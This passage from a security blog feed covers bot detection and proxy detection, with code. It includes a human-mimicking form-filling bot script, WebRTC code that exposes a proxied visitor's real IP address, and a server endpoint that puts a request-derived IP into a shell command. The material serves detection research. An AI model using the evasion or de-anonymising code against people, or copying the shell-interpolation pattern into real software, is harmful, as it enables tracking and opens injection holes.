<span class="n">email</span> <span class="o">=</span> <span class="n">getCoords</span><span class="p">(</span><span class="s1">'input[name="eMail"]'</span><span class="p">)</span>
<span class="n">humanMove</span><span class="p">(</span><span class="o">*</span><span class="n">email</span><span class="p">,</span> <span class="n">clicks</span><span class="o">=</span><span class="mi">3</span><span class="p">)</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="n">random</span><span class="o">.</span><span class="n">uniform</span><span class="p">(</span><span class="mf">0.25</span><span class="p">,</span> <span class="mf">1.25</span><span class="p">))</span>
<span class="n">humanTyping</span><span class="p">(</span><span class="s1">'bot@spambot.com</span><span class="se">\n</span><span class="s1">'</span><span class="p">,</span> <span class="n">speed</span><span class="o">=</span><span class="p">(</span><span class="mf">0.005</span><span class="p">,</span> <span class="mf">0.008</span><span class="p">))</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="n">random</span><span class="o">.</span><span class="n">uniform</span><span class="p">(</span><span class="mf">0.5</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">))</span>
<span class="c1"># agree to the terms</span>
<span class="n">terms</span> <span class="o">=</span> <span class="n">getCoords</span><span class="p">(</span><span class="s1">'input[name="terms"]'</span><span class="p">)</span>
<span class="n">humanMove</span><span class="p">(</span><span class="o">*</span><span class="n">terms</span><span class="p">)</span>
<span class="c1"># select cats</span>
<span class="n">cat</span> <span class="o">=</span> <span class="n">getCoords</span><span class="p">(</span><span class="s1">'#bigCat'</span><span class="p">)</span>
<span class="n">humanMove</span><span class="p">(</span><span class="o">*</span><span class="n">cat</span><span class="p">)</span>
<span class="c1"># submit</span>
<span class="n">submit</span> <span class="o">=</span> <span class="n">getCoords</span><span class="p">(</span><span class="s1">'#submit'</span><span class="p">)</span>
<span class="n">humanMove</span><span class="p">(</span><span class="o">*</span><span class="n">submit</span><span class="p">)</span>
<span class="c1"># press the final enter</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="n">random</span><span class="o">.</span><span class="n">uniform</span><span class="p">(</span><span class="mf">2.5</span><span class="p">,</span> <span class="mf">3.4</span><span class="p">))</span>
<span class="n">humanTyping</span><span class="p">(</span><span class="s1">'</span><span class="se">\n</span><span class="s1">'</span><span class="p">,</span> <span class="n">speed</span><span class="o">=</span><span class="p">(</span><span class="mf">0.005</span><span class="p">,</span> <span class="mf">0.008</span><span class="p">))</span>
<span class="c1"># finally get the page source</span>
<span class="n">text</span> <span class="o">=</span> <span class="n">getPageSource</span><span class="p">()</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Got </span><span class="si">{}</span><span class="s1"> bytes of page soure'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">text</span><span class="p">)))</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="n">main</span><span class="p">()</span>
</code></pre></div>Detecting Datacenter and Residential Proxies2021-04-24T22:07:00+02:002021-05-27T22:07:00+02:00Nikolai Tschachertag:incolumitas.com,2021-04-24:/2021/04/24/detecting-proxies/<p>Detecting proxys can't be that hard? Can it?</p><p>In the following blog article, I assume that we are running a web server that hosts a web page and our task is to detect with sufficient accuracy that this site's visitor is using a proxy to hide it's <em>true</em> source IP address.</p>
<p>Graphically:</p>
<div class="highlight"><pre><span></span><code><span class="p">[</span><span class="n">browser</span><span class="o">/</span><span class="n">client</span><span class="p">]</span><span class="w"> </span><span class="o">---></span><span class="w"> </span><span class="p">[</span><span class="n">http</span><span class="o">/</span><span class="n">socks</span><span class="w"> </span><span class="n">proxy</span><span class="p">]</span><span class="w"> </span><span class="o">---></span><span class="w"> </span><span class="p">[</span><span class="n">target</span><span class="w"> </span><span class="n">website</span><span class="p">]</span><span class="w"></span>
</code></pre></div>
<p>First I need to define what a proxy is: A proxy is any kind of intermediate host to which you can send your network packets in order to camouflage your true source IP address. Proxies are often used for web scraping, because when you request a website too frequently with the same IP address, you will get blocked based on your IP address access count. Therefore, switching IP addresses by using several different proxies is way to evade this kind of block.</p>
<p>For stupid people (such as me), the Internet basically runs on top of two protocols: </p>
<ol>
<li>The IP protocol - this is the protocol that handles packet routing on a hop to hop basis</li>
<li>The TCP protocol - TCP assumes that some kind of connection exists. It takes for granted that there is a connection from host A to host B. It then handles things such as reliability, congestion control and transmission loss so that applications can communicate without worrying about such things...</li>
</ol>
<p>Put differently, IP handles all the little annoying details such as: How is my packet properly routed from my Laptop's network card to the my home modem/router, how does the modem send the network packet to the ISP's infrastructure. How does the ISP route the IP packet to the next host? And so on.</p>
<p>For example, the routing path obtained with <code>tracepath</code> from my home in Germany to my webserver (also in Germany) looks like the following:</p>
<div class="highlight"><pre><span></span><code>$ tracepath incolumitas.com
1?: [LOCALHOST] pmtu 1500
1: _gateway 1.640ms
1: fritz.box 1.241ms
2: 192.0.0.2 1.382ms pmtu 1452
2: 192.0.0.1 6.680ms
3: 62.214.39.53 7.620ms
4: 62.214.37.202 17.278ms asymm 5
5: et-0-0-2.ams3-edge1.digitalocean.com 15.166ms
6: 138.197.244.86 28.158ms
7: 138.197.250.142 22.939ms asymm 6
8: no reply
9: no reply
10: 167.99.241.135 20.330ms reached
Resume: pmtu 1452 hops 10 back 9
</code></pre></div>
<p>However, we cannot take for granted that the above routing information is correct. Path discovery is often done with ICMP and routers can silently drop ICMP packages. Nobody can force any host on the IP packets path to reply (correctly).</p>
<p>The only thing that we are able to see is the external IP address of the incoming IP packet. We don't know if this is the host that is also the originator (in terms of <em>the process that sent the packet on it's way</em>) of the packet or if it is just a proxy.</p>
<p>The <em>real</em> source is the process the creates the socket and sends the TCP/IP packets on their merry way. The <em>real</em> source is the machine that orchestrates and handles the application level logic.</p>
<p>In the remainder of this blog post I will investigate several ideas how to reveal that a visitor requested my web site through a proxy.</p>
<h2>First Idea: Cross Ping</h2>
<p>This is not my idea. After visiting <a href="https://whatleaks.com/">whatleaks.com/</a>, I saw that they have a ping test that is capable of detecting whether a proxy/tunnel is used. The idea is straightforward:</p>
<blockquote>
<p>We compare ping from your computer to our server and ping from our server to the host of your external IP. If the difference is too much then there is probably a tunnel and you are using a proxy.</p>
</blockquote>
<p>Put differently, the idea is the following:</p>
<p>If there is no intermediate proxy server used, the ping time from computer (browser) to server should be the same as from server to the external IP address. But if there is a proxy server in the middle, then the ping time from server to external IP address should be significantly faster than from computer (browser) to server. We can repeat the pings in order to cancel out statistical deviations.</p>
<p>That sounds easy, but in reality we will face several issues:</p>
<ol>
<li>Ping uses the ICMP protocol. The ICMP packet is encapsulated in an IPv4 packet. The packet consists of header and data sections. ICMP is a thin protocol that builds on top of the IP protocol. We can easily use the <code>ping</code> command line utility on the server side, but not from the web browser where all we have is JavaScript. It's really not easy to implement something like ping with JavaScript.</li>
<li>When we ping the external IP address (that is assumed to either be the proxy server or the source host), we sometimes don't get an answer. The proxy server can choose to not respond to ICMP packets. However, if it is a proxy server, then a port scan must reveal at least one open TCP/IP port.</li>
</ol>
<p>The ping on the server side is easy to implement:</p>
<div class="highlight"><pre><span></span><code><span class="nx">app</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="s1">'/ping'</span><span class="p">,</span> <span class="k">async</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="c1">// ping the external IP address</span>
<span class="kd">let</span> <span class="nx">ip</span> <span class="o">=</span> <span class="nx">getIp</span><span class="p">(</span><span class="nx">req</span><span class="p">);</span>
<span class="kd">let</span> <span class="nx">command</span> <span class="o">=</span> <span class="sb">`timeout 0.75 ping -qc1 </span><span class="si">${</span><span class="nx">ip</span><span class="si">}</span><span class="sb"> 2>&1 | awk -F'/' 'END{ print (/^rtt/? "OK "$5" ms":"FAIL") }'`</span><span class="p">;</span>
<span class="kd">const</span> <span class="p">{</span> <span class="nx">stdout</span><span class="p">,</span> <span class="nx">stderr</span> <span class="p">}</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">exec</span><span class="p">(</span><span class="nx">command</span><span class="p">);</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">header</span><span class="p">(</span><span class="s2">"Content-Type"</span><span class="p">,</span><span class="s1">'application/json'</span><span class="p">);</span>
<span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="nb">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">(</span><span class="nx">stdout</span><span class="p">.</span><span class="nx">trim</span><span class="p">(),</span> <span class="kc">null</span><span class="p">,</span> <span class="mf">2</span><span class="p">));</span>
<span class="p">});</span>
</code></pre></div>
<p>The ping on the JavaScript side is if course a bit tougher. We can't sent ICMP messages, so we have to make use of what is available. </p>
<p>Of course it's also thinkable to compute the latency with through other side channels such as DNS queries, WebSocket messages or even webRTC. </p>
<p>But in the following solution, we will create an <code><img></code> element with an invalid <code>src</code> attribute and use it to estimate the RTT to the webserver. Please keep in mind that while we have a one way latency with <code>ping</code>, with JavaScript there is at least a TCP handshake involved and we talk about RTTs. </p>
<div class="highlight"><pre><span></span><code><span class="kd">function</span> <span class="nx">ping</span><span class="p">(</span><span class="nx">url</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">started</span> <span class="o">=</span> <span class="ow">new</span> <span class="nb">Date</span><span class="p">().</span><span class="nx">getTime</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">started2</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">http</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">XMLHttpRequest</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">cacheBuster</span> <span class="o">=</span> <span class="s1">'?bust='</span> <span class="o">+</span> <span class="p">(</span><span class="ow">new</span> <span class="nb">Date</span><span class="p">()).</span><span class="nx">getTime</span><span class="p">()</span>
<span class="nx">url</span> <span class="o">+=</span> <span class="nx">cacheBuster</span><span class="p">;</span>
<span class="nx">http</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="s2">"GET"</span><span class="p">,</span> <span class="nx">url</span><span class="p">,</span> <span class="cm">/*async*/</span><span class="kc">true</span><span class="p">);</span>
<span class="nx">http</span><span class="p">.</span><span class="nx">onreadystatechange</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">http</span><span class="p">.</span><span class="nx">readyState</span> <span class="o">==</span> <span class="mf">4</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">ended</span> <span class="o">=</span> <span class="ow">new</span> <span class="nb">Date</span><span class="p">().</span><span class="nx">getTime</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">ended2</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">milliseconds</span> <span class="o">=</span> <span class="nx">ended</span> <span class="o">-</span> <span class="nx">started</span><span class="p">;</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s2">"Took ms: "</span><span class="p">,</span> <span class="nx">milliseconds</span><span class="p">,</span> <span class="nx">ended2</span> <span class="o">-</span> <span class="nx">started2</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">};</span>
<span class="k">try</span> <span class="p">{</span>
<span class="nx">http</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="kc">null</span><span class="p">);</span>
<span class="p">}</span> <span class="k">catch</span><span class="p">(</span><span class="nx">exception</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// this is expected</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="nx">ping</span><span class="p">(</span><span class="s2">"https://incolumitas.com"</span><span class="p">)</span>
</code></pre></div>
<p>It's slightly pedantic to also use <code>performance.now()</code> to measure the RTT, but I want to get extra sure that <code>new Date()</code> is not accurate enough. For our use case, the Same Origin Policy does not prevent us from measuring the latency from browser -> server, because we want to measure the latency to our own origin (our own server).</p>
<p>The lines</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">cacheBuster</span> <span class="o">=</span> <span class="s1">'?bust='</span> <span class="o">+</span> <span class="p">(</span><span class="ow">new</span> <span class="nb">Date</span><span class="p">()).</span><span class="nx">getTime</span><span class="p">()</span>
<span class="nx">url</span> <span class="o">+=</span> <span class="nx">cacheBuster</span><span class="p">;</span>
</code></pre></div>
<p>prevent the browser from caching the images and thus giving false results for latency measurements.</p>
<h3>Live Example and Explanation of Results</h3>
<p>You can also visit the example page here: <a href="https://bot.incolumitas.com/crossping.html">https://bot.incolumitas.com/crossping.html</a></p>
<p>Keep in mind though: When you visit the <a href="https://bot.incolumitas.com/crossping.html">example page</a> with your normal browser that is not behind a proxy, your result will look something like this:</p>
<figure>
<img src="https://incolumitas.com/images/crossping1.png" alt="Crossping with normal Browser without beign behind a proxy" />
<figcaption>Crossping with normal browser without hiding behind a proxy. Note: I cannot ping a normal computers public IP address from my server, because usually a NAT drops all incoming ICMP packets. That's the reason why the ping fails.<span style="font-size: 60%"></span></figcaption>
</figure>
<p>On the other hand, when a browser hides behind a proxy server, you will obtain a result as below. As an example, I used a well known scraping service and tested their JavaScript capable bot with the <a href="https://bot.incolumitas.com/crossping.html">live testing site</a>.</p>
<figure>
<img src="https://incolumitas.com/images/crossping2.png" alt="Crossping with normal Browser without beign behind a proxy" />
<figcaption>Those latencies are clearly different! The route browser -> server takes much longer compared to server -> external IP address!<span style="font-size: 60%"></span></figcaption>
</figure>
<p>And another example for a scraping service's bot that hides behind a proxy:</p>
<figure>
<img src="https://incolumitas.com/images/crossping3.png" alt="Crossping with normal Browser without beign behind a proxy" />
<figcaption>Even higher latencies...<span style="font-size: 60%"></span></figcaption>
</figure>
<p>We can make two key observations:</p>
<ol>
<li>Normal users have <code>browser -> server</code> JavaScript ping latencies in the range of roughly 100ms to 500ms. But when you hide behind a proxy, this number grows significantly to the range 1500ms - 6000ms.</li>
<li>The ping latency from <code>server -> external IP address</code> can either not be obtained (because normal computers behind a NAT/CGNAT are not pingable), or the ping latencies are relatively low in case of proxy servers with a range 20ms - 200ms.</li>
</ol>
<p>From this follows that we need to make an estimate what latencies are considered <em>normal</em> and what latencies are high enough to be considered as the result of an intermediate proxy server.</p>
<h3>Improving RTT measurement server -> external IP</h3>
<p>Instead of measuring the latency with <code>ping</code> from server -> external IP address, it is probably a better idea to take the RTT measurements from the initial <a href="https://blog.packet-foo.com/2014/07/determining-tcp-initial-round-trip-time/">TCP handshake</a> of the incoming connection. There we can at least take an accurate measurement on the server. </p>
<p>Another advantage is that we don't have the problem of not pingable hosts. Also: The RTT is much easier to compare to the above JavaScript ping implementation than the <code>ping</code> one way latency.</p>
<figure>
<img src="https://incolumitas.com/images/InitialRTTServer.png" alt="Crossping with normal Browser without beign behind a proxy" />
<figcaption>Measuring the RTT on the server as the time between sending SYN/ACK and receiving the ACK<span style="font-size: 60%">Source: https://blog.packet-foo.com/2014/07/determining-tcp-initial-round-trip-time/</span> </figcaption>
</figure>
<h2>Second Idea: WebRTC Leaks the true IP Address</h2>
<p>This is a older technique, but still very relevant.</p>
<p><a href="https://en.wikipedia.org/wiki/WebRTC">WebRTC</a> (Web Real-Time Communication) is a technique that allows direct peer-to-peer communication in browseres. It is intended to make direct audio and video communication between peers possible. </p>
<p>Because direct peer to peer communication is possible, there must be a way to detect the public and internal IP addresses of the peers. This is made possible with a so called <a href="https://developer.mozilla.org/en-US/docs/Web/API/WebRTC_API/Protocols">STUN protocol</a>.</p>
<blockquote>
<p>Session Traversal Utilities for NAT (STUN) (acronym within an acronym) is a protocol to discover your public address and determine any restrictions in your router that would prevent a direct connection with a peer. The client will send a request to a STUN server on the Internet who will reply with the client’s public address and whether or not the client is accessible behind the router’s NAT. (<a href="https://developer.mozilla.org/en-US/docs/Web/API/WebRTC_API/Protocols">Source</a>)</p>
</blockquote>
<p>However, the WebRTC protocol is unaffected by the proxy settings. If a browser is configured to use a proxy server, WebRTC does not communicate through this proxy.</p>
<p>This allows us to detect the real IP address of a browser that uses otherwise a proxy.</p>
<h3>WebRTC JavaScript Detection Implementation</h3>
<p>Visit the <a href="https://bot.incolumitas.com/webRTCclean.html">demo site</a>.</p>
<p>The following JavaScript Source demonstrates the technique:</p>
<div class="highlight"><pre><span></span><code><span class="cp"><!DOCTYPE html></span><span class="p"><</span><span class="nt">html</span><span class="p">></span>
<span class="p"><</span><span class="nt">head</span><span class="p">></span>
<span class="p"><</span><span class="nt">meta</span> <span class="na">charset</span><span class="o">=</span><span class="s">"utf-8"</span><span class="p">></span>
<span class="p"><</span><span class="nt">meta</span> <span class="na">name</span><span class="o">=</span><span class="s">"viewport"</span> <span class="na">content</span><span class="o">=</span><span class="s">"width=device-width, initial-scale=1"</span><span class="p">></span>
<span class="p"><</span><span class="nt">title</span><span class="p">></span>WebRTC leak<span class="p"></</span><span class="nt">title</span><span class="p">></span>
<span class="p"></</span><span class="nt">head</span><span class="p">></span>
<span class="p"><</span><span class="nt">body</span><span class="p">></span>
<span class="p"><</span><span class="nt">script</span><span class="p">></span>
<span class="kd">var</span> <span class="nx">ips</span> <span class="o">=</span> <span class="p">[];</span>
<span class="kd">function</span> <span class="nx">findIP</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">myPeerConnection</span> <span class="o">=</span> <span class="nb">window</span><span class="p">.</span><span class="nx">RTCPeerConnection</span> <span class="o">||</span> <span class="nb">window</span><span class="p">.</span><span class="nx">mozRTCPeerConnection</span> <span class="o">||</span> <span class="nb">window</span><span class="p">.</span><span class="nx">webkitRTCPeerConnection</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">pc</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">myPeerConnection</span><span class="p">({</span><span class="nx">iceServers</span><span class="o">:</span> <span class="p">[{</span><span class="nx">urls</span><span class="o">:</span> <span class="s2">"stun:stun.l.google.com:19302"</span><span class="p">}]}),</span>
<span class="nx">noop</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{},</span>
<span class="nx">localIPs</span> <span class="o">=</span> <span class="p">{},</span>
<span class="nx">ipRegex</span> <span class="o">=</span> <span class="sr">/([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/g</span><span class="p">,</span>
<span class="nx">key</span><span class="p">;</span>
<span class="kd">function</span> <span class="nx">ipIterate</span><span class="p">(</span><span class="nx">ip</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">localIPs</span><span class="p">[</span><span class="nx">ip</span><span class="p">])</span> <span class="p">{</span>
<span class="nx">ips</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="nx">ip</span><span class="p">);</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="s2">"webRTCResult"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nb">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">(</span><span class="nx">ips</span><span class="p">,</span> <span class="kc">null</span><span class="p">,</span> <span class="mf">2</span><span class="p">);</span>
<span class="p">}</span>
<span class="nx">localIPs</span><span class="p">[</span><span class="nx">ip</span><span class="p">]</span> <span class="o">=</span> <span class="kc">true</span><span class="p">;</span>
<span class="p">}</span>
<span class="nx">pc</span><span class="p">.</span><span class="nx">createDataChannel</span><span class="p">(</span><span class="s2">""</span><span class="p">);</span>
<span class="nx">pc</span><span class="p">.</span><span class="nx">createOffer</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">sdp</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">sdp</span><span class="p">.</span><span class="nx">sdp</span><span class="p">.</span><span class="nx">split</span><span class="p">(</span><span class="s1">'\n'</span><span class="p">).</span><span class="nx">forEach</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">line</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">line</span><span class="p">.</span><span class="nx">indexOf</span><span class="p">(</span><span class="s1">'candidate'</span><span class="p">)</span> <span class="o"><</span> <span class="mf">0</span><span class="p">)</span> <span class="k">return</span><span class="p">;</span>
<span class="nx">line</span><span class="p">.</span><span class="nx">match</span><span class="p">(</span><span class="nx">ipRegex</span><span class="p">).</span><span class="nx">forEach</span><span class="p">(</span><span class="nx">ipIterate</span><span class="p">);</span>
<span class="p">});</span>
<span class="nx">pc</span><span class="p">.</span><span class="nx">setLocalDescription</span><span class="p">(</span><span class="nx">sdp</span><span class="p">,</span> <span class="nx">noop</span><span class="p">,</span> <span class="nx">noop</span><span class="p">);</span>
<span class="p">},</span> <span class="nx">noop</span><span class="p">);</span>
<span class="nx">pc</span><span class="p">.</span><span class="nx">onicecandidate</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">ice</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">ice</span> <span class="o">||</span> <span class="o">!</span><span class="nx">ice</span><span class="p">.</span><span class="nx">candidate</span> <span class="o">||</span> <span class="o">!</span><span class="nx">ice</span><span class="p">.</span><span class="nx">candidate</span><span class="p">.</span><span class="nx">candidate</span> <span class="o">||</span> <span class="o">!</span><span class="nx">ice</span><span class="p">.</span><span class="nx">candidate</span><span class="p">.</span><span class="nx">candidate</span><span class="p">.</span><span class="nx">match</span><span class="p">(</span><span class="nx">ipRegex</span><span class="p">))</span> <span class="k">return</span><span class="p">;</span>
<span class="nx">ice</span><span class="p">.</span><span class="nx">candidate</span><span class="p">.</span><span class="nx">candidate</span><span class="p">.</span><span class="nx">match</span><span class="p">(</span><span class="nx">ipRegex</span><span class="p">).</span><span class="nx">forEach</span><span class="p">(</span><span class="nx">ipIterate</span><span class="p">);</span>
<span class="p">};</span>
<span class="p">}</span>
<span class="k">try</span> <span class="p">{</span>
<span class="nx">findIP</span><span class="p">();</span>
<span class="p">}</span> <span class="k">catch</span><span class="p">(</span><span class="nx">err</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">ips</span> <span class="o">=</span> <span class="s1">'WebRTC failed: '</span> <span class="o">+</span> <span class="nx">err</span><span class="p">.</span><span class="nx">toString</span><span class="p">();</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="s2">"webRTCResult"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nb">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">(</span><span class="nx">ips</span><span class="p">,</span> <span class="kc">null</span><span class="p">,</span> <span class="mf">2</span><span class="p">);</span>
<span class="p">}</span>
<span class="p"></</span><span class="nt">script</span><span class="p">></span>
<span class="p"><</span><span class="nt">h4</span><span class="p">></span>WebRTC Detected IPs<span class="p"></</span><span class="nt">h4</span><span class="p">></span>
<span class="p"><</span><span class="nt">pre</span> <span class="na">id</span><span class="o">=</span><span class="s">"webRTCResult"</span><span class="p">></</span><span class="nt">pre</span><span class="p">></span>
<span class="p"></</span><span class="nt">body</span><span class="p">></span>
<span class="p"></</span><span class="nt">html</span><span class="p">></span>
</code></pre></div>Behavioral Analysis for Bot Detection2021-04-11T22:07:00+02:002021-04-11T22:07:00+02:00Nikolai Tschachertag:incolumitas.com,2021-04-11:/2021/04/11/bot-detection-with-behavioral-analysis/<p>Behavioral analysis is an interesting approach to detect bots. It surely is not the panacea for bot detection, but it certainly is an useful extension in your bot hunting tool belt.</p><h2>Introduction</h2>
<p>Bots are programs created by humans to automate repetitive tasks in the Internet. In the widest sense, the emergence of bots is a manifestation of the process of worldwide automatization that we currently experience in our modern times.</p>
<p>Some Examples of Bots:</p>
<ol>
<li>Sometimes bots only scrape Google or Amazon search engine results pages</li>
<li>Some bots <a href="https://antoinevastel.com/javascript/2019/08/31/sneakers-supreme-bots.html">buy highly sought after Nike sneakers</a> immediately after release</li>
<li>Other bots purchase PlayStation5 consoles from official vendor stores as soon as they are restocked. This happens before legitimate users have a change to buy a PS5 console (Scalping).</li>
<li>Other bots automate banking transactions in order to disintermediate online banks</li>
</ol>
<p>My conjecture is: Automated programs behave not the same as real human beings.</p>
<p>What to I mean with that from a technical perspective?</p>
<p>Before we can classify behavioral data as either bot-like or human, we have to record and collect it.</p>
<p>The idea is to record the following JavaScript events from every website user:</p>
<ul>
<li>Events indicating page load - <a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/load_event">load</a> / <a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/DOMContentLoaded_event">DOMContentLoaded</a></li>
<li>User switches the tab - <a href="https://developer.mozilla.org/en-US/docs/Web/API/Document/visibilitychange_event">visibilitychange</a></li>
<li>Mouse events - <a href="https://developer.mozilla.org/en-US/docs/Web/API/Element/mousedown_event">mousedown / mouseup</a> and <a href="https://developer.mozilla.org/en-US/docs/Web/API/Element/mousemove_event">mousemove</a></li>
<li>Scroll events - <a href="https://developer.mozilla.org/en-US/docs/Web/API/Element/scroll">scroll</a></li>
<li>Mobile Touch Events - <a href="https://developer.mozilla.org/en-US/docs/Web/API/Touch_events">touchstart / touchend</a> and <a href="https://developer.mozilla.org/en-US/docs/Web/API/Document/touchmove_event">touchmove</a></li>
<li>Keyboard events - <a href="https://developer.mozilla.org/en-US/docs/Web/API/Document/keydown_event">keydown / keyup</a></li>
<li>Events indicating the unloading of the page - <a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/pagehide_event">pagehide</a> / <a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/unload_event">unload</a> / <a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/beforeunload_event">beforeunload</a></li>
</ul>
<p>Each of the above events is assigned a timestamp obtained with <code>performance.now()</code>.</p>
<p>The above process yields a time series of behavioral interaction data such as for example:</p>
<div class="highlight"><pre><span></span><code><span class="p">[</span>
<span class="p">[</span><span class="s2">"dcl"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">665.72</span><span class="p">],[</span><span class="s2">"s"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="mf">3265</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">730.785</span><span class="p">],[</span><span class="s2">"s"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="mf">3265</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">897.025</span><span class="p">],[</span><span class="s2">"s"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="mf">3286</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">984</span><span class="p">],[</span><span class="s2">"lo"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1039.395</span><span class="p">],[</span><span class="s2">"s"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="mf">3540</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1040.78</span><span class="p">],[</span><span class="s2">"s"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="mf">3561</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1051.26</span><span class="p">],[</span><span class="s2">"s"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="mf">3561</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1062.775</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">1053</span><span class="p">,</span><span class="mf">199</span><span class="p">,</span><span class="mf">2973</span><span class="p">,</span><span class="mf">300</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1488.325</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">1050</span><span class="p">,</span><span class="mf">201</span><span class="p">,</span><span class="mf">2970</span><span class="p">,</span><span class="mf">302</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1496.05</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">1019</span><span class="p">,</span><span class="mf">214</span><span class="p">,</span><span class="mf">2939</span><span class="p">,</span><span class="mf">315</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1512.66</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">951</span><span class="p">,</span><span class="mf">243</span><span class="p">,</span><span class="mf">2871</span><span class="p">,</span><span class="mf">344</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1529.29</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">845</span><span class="p">,</span><span class="mf">277</span><span class="p">,</span><span class="mf">2765</span><span class="p">,</span><span class="mf">378</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1546.015</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">717</span><span class="p">,</span><span class="mf">313</span><span class="p">,</span><span class="mf">2637</span><span class="p">,</span><span class="mf">414</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1562.555</span><span class="p">],[</span><span 